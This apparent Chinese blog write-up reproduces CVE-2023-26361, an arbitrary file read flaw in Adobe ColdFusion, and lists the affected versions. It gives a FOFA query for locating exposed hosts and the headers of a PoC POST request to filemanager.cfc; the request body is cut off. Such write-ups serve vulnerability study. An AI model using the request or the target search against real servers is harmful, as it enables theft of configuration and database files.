Adobe ColdFusion 任意文件读取漏洞复现(CVE-2023-26361)

  • 开发
  • 37

0x01 产品简介

Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

0x02 漏洞概述

Adobe ColdFusion平台 filemanager.cfc接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 影响范围

Adobe ColdFusion 2018 Update 15

Adobe ColdFusion 2021 Update 5

0x04 复现环境

FOFA:app="Adobe-ColdFusion"

0x05 漏洞复现

PoC

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng
阅读全部

相关推荐

  4. 漏洞】Adobe ColdFusion 任意文件读取漏洞 CVE-2024-20767

    2024-01-28 09:32:03       14 阅读

  7. Jenkins CLI 任意文件读取漏洞(CVE-2024-23897)

    2024-01-28 09:32:03       35 阅读

  8. CVE-2024-24565:CrateDB数据库任意文件读取漏洞 [附POC]

    2024-01-28 09:32:03       34 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-01-28 09:32:03       19 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-28 09:32:03       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-01-28 09:32:03       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-01-28 09:32:03       20 阅读

热门阅读

  2. 在React中使用React.createRef:更优雅的DOM引用方式

    2024-01-28 09:32:03       34 阅读

  4. ubuntu和树莓派下vim插件管理

    2024-01-28 09:32:03       29 阅读

  6. MySQL SQL 注入

    2024-01-28 09:32:03       36 阅读

  9. vue父子组件传值问题

    2024-01-28 09:32:03       24 阅读

  10. Go MongoDB Driver 中的 A D M E 类型是什么

    2024-01-28 09:32:03       29 阅读

  12. windows 和 ubuntu (20.4) 双系统:开机选择系统时,等待时间的设置

    2024-01-28 09:32:03       35 阅读

  14. 8-Docker网络命令之prune

    2024-01-28 09:32:03       31 阅读

  17. DAY31:贪心算法入门455、53、376

    2024-01-28 09:32:03       35 阅读

  18. MySQL中一条更新语句是怎么执行的?

    2024-01-28 09:32:03       36 阅读

  21. 代码随想录算法训练59 | 单调栈part02

    2024-01-28 09:32:03       35 阅读